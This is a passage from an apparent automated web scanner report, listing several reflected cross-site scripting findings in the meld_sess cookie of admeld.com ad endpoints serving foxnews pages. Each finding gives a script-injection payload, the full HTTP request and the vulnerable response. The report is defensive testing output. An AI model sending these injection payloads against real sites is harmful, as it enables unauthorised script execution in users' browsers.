The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 292b6"><script>alert(1)</script>f08dbb572df was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/3/foxnews/728x90/ros?t=1302543075864&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=e36a2f20-9985-4dcd-82e9-6ff0312e024e292b6"><script>alert(1)</script>f08dbb572df; D41U=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgMywgIHNpdGU6ICAgICAgICAgImZveG5ld3MiLCAgYWQ6ICAgICAgICAgICA2MzA2MCwgIG5ldHdvcms6ICAgICAgIm1heHBvaW50IiwgIHNpemU6ICAgICAgICAgIjcyOHg5MCIsICBmcmVxOiAgICAgICAgICIxLTk5OSIsICBkZWZhdWx0czogICAgICIwLTAiLCAgcmVxdWVzdDogICAgICAiZTk5MThhZjktYWZjOS00YzYyLWI4MmMtMzVhN2I3MWI0YzQxIiwgIHVzZXI6ICAgICAgICAgImUzNmEyZjIwLTk5ODUtNGRjZC04MmU5LTZmZjAzMTJlMDI0ZTI5MmI2Ij48c2NyaXB0PmFsZXJ0KDEpPC9zY3JpcHQ+ZjA4ZGJiNTcyZGYiLCAgY291bnRyeTogICAgICAiVVMiLCAgY2l0eTogICAgICAgICAiRGFsbGFzIiwgIGRtYTogICAgICAgICAgNjIzLCAgcmVnaW9uOiAgICAgICAiVFgiLCAgaXA6ICAgICAgICAgICAiMTczLjE5My4yMTQuMjQzIiwgIGRlcHRoOiAgICAgICAgMSwgIHRhcmdldDogICAgICAgInJvcyIsICBkaXY6ICAgICAgICAgICJlOTkxOGFmOS1hZmM5LTRjNjItYjgyYy0zNWE3YjcxYjRjNDEiLCAgdXJsOiAgICAgICAgICAiaHR0cDovL3d3dy5mb3huZXdzLmNvbS9wb2xpdGljcy9pbmRleC5odG1sIiwgIGVsYXBzZWQ6ICAgICAgMCwgIGRlY2lzaW9uOiAgICAgInJlYWwtdGltZSBiaWQiLCAgaW1wOiAgICAgICAgICAxLCAgbmV0d29ya19pZDogICAyMzMsICBhY2NvdW50X2lkOiAgIDYyODksICBuZXR3b3JrX25hbWU6ICJNYXhQb2ludCBJbnRlcmFjdGl2ZSAoUlRCKSIsICBwdWJsaXNoZXJfbmFtZTogImZveG5ld3MiLCAgZWNwbTogICAgICAgICAiMS43NiIsICBmZWNwbTogICAgICAgICIxLjc2IiwgIGZpbGw6ICAgICAgICAgIjEwMC4wMCIsICBwbGFjZW1lbnQ6ICAgICJyb3MiLCAgcnVsZTogICAgICAgICAicm9zIiwgIGNyZWF0aXZlX2lkOiAgIiIsICBiaWRkZXJzOiAgICAgIFt7Im5ldHdvcmtfbmFtZSI6Ik1heFBvaW50IEludGVyYWN0aXZlIChSVEIpIiwgImJpZCI6IjMuMDEiLCJhZCI6NjMwNjAsICJidXkiOjE3OCwibHAiOiJodHRwOi8vd3d3LnR5c29uLmNvbS9Db25zdW1lci9Qcm9kdWN0cy9Qcm9tb3Rpb25zL1VsdGltYXRlQ2hpY2tlblNhbmR3aWNoLmFzcHg/Y21waWQ9U2FuZHdpY2hBbnlOaWdodEdTTmV0d29yayIsImFuIjoiIiwic3RhdHVzIjoiMy4wMSIsImZpZCI6NDg5MiwgImZjcG0iOiIxLjc1In0seyJuZXR3b3JrX25hbWUiOiJNZWRpYU1hdGggKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjoxOTcxODIsICJidXkiOjUwNCwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJUdXJuIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6NjI4OTksICJidXkiOjE5NiwibHAiOiJodHRwOi8vd2VsY29tZS5ocC5jb20vY291bnRyeS91cy9lbi9jcy9ob21lX2MuaHRtbCIsImFuIjoiSFAgRGlyZWN0Iiwic3RhdHVzIjoiMC4xNiIsImZpZCI6NDg5MiwgImZjcG0iOiIxLjc1In0seyJuZXR3b3JrX25hbWUiOiJEYXRhWHUgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjo2Mjk4MSwgImJ1eSI6MjAwLCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifV0sICB0YXJnZXRpbmc6ICAgICIiLCAgYWR2ZXJ0aXNlcjogICAgIiIsICBsYW5kaW5nX3BhZ2U6ICAgICJodHRwOi8vd3d3LnR5c29uLmNvbS9Db25zdW1lci9Qcm9kdWN0cy9Qcm9tb3Rpb25zL1VsdGltYXRlQ2hpY2tlblNhbmR3aWNoLmFzcHg/Y21waWQ9U2FuZHdpY2hBbnlOaWdodEdTTmV0d29yayIsICBob3N0OiAgICAgICAgICJuai10YWc0NCJ9
Content-Length: 1673
Content-Type: text/html
Date: Mon, 11 Apr 2011 17:31:22 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:px;height:px;margin:0;border:0">



...[SNIP]...
0" height="0" border="0" marginwidth="0" marginheight="0" frameborder="0" src="http://r.turn.com/server/pixel.htm?fpid=4&sp=y&admeld_call_type=iframe&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e292b6"><script>alert(1)</script>f08dbb572df&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match">
...[SNIP]...

1.159. http://tag.admeld.com/ad/iframe/3/foxnews/728x90/ros [meld_sess cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/3/foxnews/728x90/ros

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1db9d"><script>alert(1)</script>278531f8b82 was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/3/foxnews/728x90/ros?t=1302543075864&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=e36a2f20-9985-4dcd-82e9-6ff0312e024e1db9d"><script>alert(1)</script>278531f8b82; D41U=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgMywgIHNpdGU6ICAgICAgICAgImZveG5ld3MiLCAgYWQ6ICAgICAgICAgICA2MzA2MCwgIG5ldHdvcms6ICAgICAgIm1heHBvaW50IiwgIHNpemU6ICAgICAgICAgIjcyOHg5MCIsICBmcmVxOiAgICAgICAgICIxLTk5OSIsICBkZWZhdWx0czogICAgICIwLTAiLCAgcmVxdWVzdDogICAgICAiYzEyNzcwMDMtMGZiNi00NGRhLTkzZmItMDVhMWY3NzAwOGIwIiwgIHVzZXI6ICAgICAgICAgImUzNmEyZjIwLTk5ODUtNGRjZC04MmU5LTZmZjAzMTJlMDI0ZTFkYjlkIj48c2NyaXB0PmFsZXJ0KDEpPC9zY3JpcHQ+Mjc4NTMxZjhiODIiLCAgY291bnRyeTogICAgICAiVVMiLCAgY2l0eTogICAgICAgICAiRGFsbGFzIiwgIGRtYTogICAgICAgICAgNjIzLCAgcmVnaW9uOiAgICAgICAiVFgiLCAgaXA6ICAgICAgICAgICAiMTczLjE5My4yMTQuMjQzIiwgIGRlcHRoOiAgICAgICAgMSwgIHRhcmdldDogICAgICAgInJvcyIsICBkaXY6ICAgICAgICAgICJjMTI3NzAwMy0wZmI2LTQ0ZGEtOTNmYi0wNWExZjc3MDA4YjAiLCAgdXJsOiAgICAgICAgICAiaHR0cDovL3d3dy5mb3huZXdzLmNvbS9wb2xpdGljcy9pbmRleC5odG1sIiwgIGVsYXBzZWQ6ICAgICAgMCwgIGRlY2lzaW9uOiAgICAgInJlYWwtdGltZSBiaWQiLCAgaW1wOiAgICAgICAgICAxLCAgbmV0d29ya19pZDogICAyMzMsICBhY2NvdW50X2lkOiAgIDYyODksICBuZXR3b3JrX25hbWU6ICJNYXhQb2ludCBJbnRlcmFjdGl2ZSAoUlRCKSIsICBwdWJsaXNoZXJfbmFtZTogImZveG5ld3MiLCAgZWNwbTogICAgICAgICAiMS43NiIsICBmZWNwbTogICAgICAgICIxLjc2IiwgIGZpbGw6ICAgICAgICAgIjEwMC4wMCIsICBwbGFjZW1lbnQ6ICAgICJyb3MiLCAgcnVsZTogICAgICAgICAicm9zIiwgIGNyZWF0aXZlX2lkOiAgIiIsICBiaWRkZXJzOiAgICAgIFt7Im5ldHdvcmtfbmFtZSI6Ik1heFBvaW50IEludGVyYWN0aXZlIChSVEIpIiwgImJpZCI6IjMuMDEiLCJhZCI6NjMwNjAsICJidXkiOjE3OCwibHAiOiJodHRwOi8vd3d3LnR5c29uLmNvbS9Db25zdW1lci9Qcm9kdWN0cy9Qcm9tb3Rpb25zL1VsdGltYXRlQ2hpY2tlblNhbmR3aWNoLmFzcHg/Y21waWQ9U2FuZHdpY2hBbnlOaWdodEdTTmV0d29yayIsImFuIjoiIiwic3RhdHVzIjoiMy4wMSIsImZpZCI6NDg5MiwgImZjcG0iOiIxLjc1In0seyJuZXR3b3JrX25hbWUiOiJNZWRpYU1hdGggKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjoxOTcxODIsICJidXkiOjUwNCwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJUdXJuIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6NjI4OTksICJidXkiOjE5NiwibHAiOiJodHRwOi8vd2VsY29tZS5ocC5jb20vY291bnRyeS91cy9lbi9jcy9ob21lX2MuaHRtbCIsImFuIjoiSFAgRGlyZWN0Iiwic3RhdHVzIjoiMC4xNiIsImZpZCI6NDg5MiwgImZjcG0iOiIxLjc1In0seyJuZXR3b3JrX25hbWUiOiJEYXRhWHUgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjo2Mjk4MSwgImJ1eSI6MjAwLCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifV0sICB0YXJnZXRpbmc6ICAgICIiLCAgYWR2ZXJ0aXNlcjogICAgIiIsICBsYW5kaW5nX3BhZ2U6ICAgICJodHRwOi8vd3d3LnR5c29uLmNvbS9Db25zdW1lci9Qcm9kdWN0cy9Qcm9tb3Rpb25zL1VsdGltYXRlQ2hpY2tlblNhbmR3aWNoLmFzcHg/Y21waWQ9U2FuZHdpY2hBbnlOaWdodEdTTmV0d29yayIsICBob3N0OiAgICAgICAgICJuai10YWcyNiJ9
Content-Length: 1673
Content-Type: text/html
Date: Mon, 11 Apr 2011 17:31:21 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:px;height:px;margin:0;border:0">



...[SNIP]...
<script type="text/javascript" src="http://pixel.invitemedia.com/admeld_sync?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e1db9d"><script>alert(1)</script>278531f8b82&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match">
...[SNIP]...

1.160. http://tag.admeld.com/ad/iframe/3/foxnewsrtb/300x250/ros [meld_sess cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/3/foxnewsrtb/300x250/ros

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df14e"><script>alert(1)</script>027a0ae2e79 was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/3/foxnewsrtb/300x250/ros?t=1302544276627&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=e36a2f20-9985-4dcd-82e9-6ff0312e024edf14e"><script>alert(1)</script>027a0ae2e79; D41U=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgMywgIHNpdGU6ICAgICAgICAgImZveG5ld3NydGIiLCAgYWQ6ICAgICAgICAgICAzMzU4NzIsICBuZXR3b3JrOiAgICAgICJtYXhwb2ludCIsICBzaXplOiAgICAgICAgICIzMDB4MjUwIiwgIGZyZXE6ICAgICAgICAgIjEtOTk5IiwgIGRlZmF1bHRzOiAgICAgIjAtMCIsICByZXF1ZXN0OiAgICAgICJhNjU4MTQxZS01NTYxLTQ0ZjMtOTQ4Ny1hMGJmOTRmMTMzMTQiLCAgdXNlcjogICAgICAgICAiZTM2YTJmMjAtOTk4NS00ZGNkLTgyZTktNmZmMDMxMmUwMjRlZGYxNGUiPjxzY3JpcHQ+YWxlcnQoMSk8L3NjcmlwdD4wMjdhMGFlMmU3OSIsICBjb3VudHJ5OiAgICAgICJVUyIsICBjaXR5OiAgICAgICAgICJEYWxsYXMiLCAgZG1hOiAgICAgICAgICA2MjMsICByZWdpb246ICAgICAgICJUWCIsICBpcDogICAgICAgICAgICIxNzMuMTkzLjIxNC4yNDMiLCAgZGVwdGg6ICAgICAgICAxLCAgdGFyZ2V0OiAgICAgICAicm9zIiwgIGRpdjogICAgICAgICAgImE2NTgxNDFlLTU1NjEtNDRmMy05NDg3LWEwYmY5NGYxMzMxNCIsICB1cmw6ICAgICAgICAgICJodHRwOi8vd3d3LmZveG5ld3MuY29tL3BvbGl0aWNzL2luZGV4Lmh0bWwiLCAgZWxhcHNlZDogICAgICAwLCAgZGVjaXNpb246ICAgICAicmVhbC10aW1lIGJpZCIsICBpbXA6ICAgICAgICAgIDEsICBuZXR3b3JrX2lkOiAgIDIzMywgIGFjY291bnRfaWQ6ICAgNjI4OSwgIG5ldHdvcmtfbmFtZTogIk1heFBvaW50IEludGVyYWN0aXZlIChSVEIpIiwgIHB1Ymxpc2hlcl9uYW1lOiAiZm94bmV3cyIsICBlY3BtOiAgICAgICAgICIxLjc2IiwgIGZlY3BtOiAgICAgICAgIjEuNzYiLCAgZmlsbDogICAgICAgICAiMTAwLjAwIiwgIHBsYWNlbWVudDogICAgInJvcyIsICBydWxlOiAgICAgICAgICJyb3MiLCAgY3JlYXRpdmVfaWQ6ICAiIiwgIGJpZGRlcnM6ICAgICAgW3sibmV0d29ya19uYW1lIjoiTWF4UG9pbnQgSW50ZXJhY3RpdmUgKFJUQikiLCAiYmlkIjoiMy4wMSIsImFkIjozMzU4NzIsICJidXkiOjE3NiwibHAiOiJodHRwOi8vd3d3LnR5c29uLmNvbS9Db25zdW1lci9Qcm9kdWN0cy9Qcm9tb3Rpb25zL1VsdGltYXRlQ2hpY2tlblNhbmR3aWNoLmFzcHg/Y21waWQ9U2FuZHdpY2hBbnlOaWdodEdTTmV0d29yayIsImFuIjoiIiwic3RhdHVzIjoiMy4wMSIsImZpZCI6NDg5MiwgImZjcG0iOiIxLjc1In0seyJuZXR3b3JrX25hbWUiOiJNZWRpYU1hdGggKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjozMzU5MDksICJidXkiOjUwMywibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIHJlc3BvbnNlIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IlR1YmVtb2d1bCAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjU4OTYyMTIsICJidXkiOjg0NzEsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiVHVybiAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjMzNTg3OSwgImJ1eSI6MTg5LCJscCI6Imh0dHA6Ly93d3cuZmFjZWJvb2suY29tL1N1cGVyOD92PWFwcF82MDA5Mjk0MDg2IiwiYW4iOiJTdXBlciA4Iiwic3RhdHVzIjoiMC4wNCIsImZpZCI6NDg5MiwgImZjcG0iOiIxLjc1In0seyJuZXR3b3JrX25hbWUiOiJEYXRhWHUgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjozMzU4ODIsICJidXkiOjE5OSwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIHJlc3BvbnNlIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifV0sICB0YXJnZXRpbmc6ICAgICIiLCAgYWR2ZXJ0aXNlcjogICAgIiIsICBsYW5kaW5nX3BhZ2U6ICAgICJodHRwOi8vd3d3LnR5c29uLmNvbS9Db25zdW1lci9Qcm9kdWN0cy9Qcm9tb3Rpb25zL1VsdGltYXRlQ2hpY2tlblNhbmR3aWNoLmFzcHg/Y21waWQ9U2FuZHdpY2hBbnlOaWdodEdTTmV0d29yayIsICBob3N0OiAgICAgICAgICJuai10YWczNSJ9
Content-Length: 1674
Content-Type: text/html
Date: Mon, 11 Apr 2011 17:51:26 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:px;height:px;margin:0;border:0">



...[SNIP]...
<img width="0" height="0" src="http://p.brilig.com/contact/bct?pid=21008FFD-5920-49E9-AC20-F85A35BDDE15&_ct=pixel&puid=e36a2f20-9985-4dcd-82e9-6ff0312e024edf14e"><script>alert(1)</script>027a0ae2e79&REDIR=http://tag.admeld.com/pixel?admeld_dataprovider_id=27&external_user_id=1&_m=1&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024edf14e">
...[SNIP]...

1.161. http://tag.admeld.com/ad/iframe/3/foxnewsrtb/300x250/ros [meld_sess cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/3/foxnewsrtb/300x250/ros

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94090"><script>alert(1)</script>c17b581f298 was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/3/foxnewsrtb/300x250/ros?t=1302544276627&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=e36a2f20-9985-4dcd-82e9-6ff0312e024e94090"><script>alert(1)</script>c17b581f298; D41U=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgMywgIHNpdGU6ICAgICAgICAgImZveG5ld3NydGIiLCAgYWQ6ICAgICAgICAgICAzMzU4NzIsICBuZXR3b3JrOiAgICAgICJtYXhwb2ludCIsICBzaXplOiAgICAgICAgICIzMDB4MjUwIiwgIGZyZXE6ICAgICAgICAgIjEtOTk5IiwgIGRlZmF1bHRzOiAgICAgIjAtMCIsICByZXF1ZXN0OiAgICAgICJiOGRkOTkwYi1hZTBlLTRkOWQtYTE2Mi0zYjYyOWExNWI3MGEiLCAgdXNlcjogICAgICAgICAiZTM2YTJmMjAtOTk4NS00ZGNkLTgyZTktNmZmMDMxMmUwMjRlOTQwOTAiPjxzY3JpcHQ+YWxlcnQoMSk8L3NjcmlwdD5jMTdiNTgxZjI5OCIsICBjb3VudHJ5OiAgICAgICJVUyIsICBjaXR5OiAgICAgICAgICJEYWxsYXMiLCAgZG1hOiAgICAgICAgICA2MjMsICByZWdpb246ICAgICAgICJUWCIsICBpcDogICAgICAgICAgICIxNzMuMTkzLjIxNC4yNDMiLCAgZGVwdGg6ICAgICAgICAxLCAgdGFyZ2V0OiAgICAgICAicm9zIiwgIGRpdjogICAgICAgICAgImI4ZGQ5OTBiLWFlMGUtNGQ5ZC1hMTYyLTNiNjI5YTE1YjcwYSIsICB1cmw6ICAgICAgICAgICJodHRwOi8vd3d3LmZveG5ld3MuY29tL3BvbGl0aWNzL2luZGV4Lmh0bWwiLCAgZWxhcHNlZDogICAgICAwLCAgZGVjaXNpb246ICAgICAicmVhbC10aW1lIGJpZCIsICBpbXA6ICAgICAgICAgIDEsICBuZXR3b3JrX2lkOiAgIDIzMywgIGFjY291bnRfaWQ6ICAgNjI4OSwgIG5ldHdvcmtfbmFtZTogIk1heFBvaW50IEludGVyYWN0aXZlIChSVEIpIiwgIHB1Ymxpc2hlcl9uYW1lOiAiZm94bmV3cyIsICBlY3BtOiAgICAgICAgICIxLjc2IiwgIGZlY3BtOiAgICAgICAgIjEuNzYiLCAgZmlsbDogICAgICAgICAiMTAwLjAwIiwgIHBsYWNlbWVudDogICAgInJvcyIsICBydWxlOiAgICAgICAgICJyb3MiLCAgY3JlYXRpdmVfaWQ6ICAiIiwgIGJpZGRlcnM6ICAgICAgW3sibmV0d29ya19uYW1lIjoiTWF4UG9pbnQgSW50ZXJhY3RpdmUgKFJUQikiLCAiYmlkIjoiMy4wMSIsImFkIjozMzU4NzIsICJidXkiOjE3NiwibHAiOiJodHRwOi8vd3d3LnR5c29uLmNvbS9Db25zdW1lci9Qcm9kdWN0cy9Qcm9tb3Rpb25zL1VsdGltYXRlQ2hpY2tlblNhbmR3aWNoLmFzcHg/Y21waWQ9U2FuZHdpY2hBbnlOaWdodEdTTmV0d29yayIsImFuIjoiIiwic3RhdHVzIjoiMy4wMSIsImZpZCI6NDg5MiwgImZjcG0iOiIxLjc1In0seyJuZXR3b3JrX25hbWUiOiJNZWRpYU1hdGggKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjozMzU5MDksICJidXkiOjUwMywibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJUdWJlbW9ndWwgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjo1ODk2MjEyLCAiYnV5Ijo4NDcxLCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IlR1cm4gKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjozMzU4NzksICJidXkiOjE4OSwibHAiOiJodHRwOi8vY3J1aXNlLnNlYWJvdXJuLmNvbS8/aWJwLWNhbXA9VHVybl9PbmxpbmUiLCJhbiI6IllhY2h0cyBvZiBTZWFib3VybiIsInN0YXR1cyI6IjAuMDkiLCJmaWQiOjQ4OTIsICJmY3BtIjoiMS43NSJ9LHsibmV0d29ya19uYW1lIjoiRGF0YVh1IChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MzM1ODgyLCAiYnV5IjoxOTksImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9XSwgIHRhcmdldGluZzogICAgIiIsICBhZHZlcnRpc2VyOiAgICAiIiwgIGxhbmRpbmdfcGFnZTogICAgImh0dHA6Ly93d3cudHlzb24uY29tL0NvbnN1bWVyL1Byb2R1Y3RzL1Byb21vdGlvbnMvVWx0aW1hdGVDaGlja2VuU2FuZHdpY2guYXNweD9jbXBpZD1TYW5kd2ljaEFueU5pZ2h0R1NOZXR3b3JrIiwgIGhvc3Q6ICAgICAgICAgIm5qLXRhZzQ3In0=
Content-Length: 1674
Content-Type: text/html
Date: Mon, 11 Apr 2011 17:51:26 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:px;height:px;margin:0;border:0">



...[SNIP]...
0" height="0" border="0" marginwidth="0" marginheight="0" frameborder="0" src="http://r.turn.com/server/pixel.htm?fpid=4&sp=y&admeld_call_type=iframe&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e94090"><script>alert(1)</script>c17b581f298&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match">
...[SNIP]...

1.162. http://tag.admeld.com/ad/iframe/3/foxnewsrtb/728x90/ros [meld_sess cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/3/foxnewsrtb/728x90/ros

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6816"><script>alert(1)</script>c086142570 was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

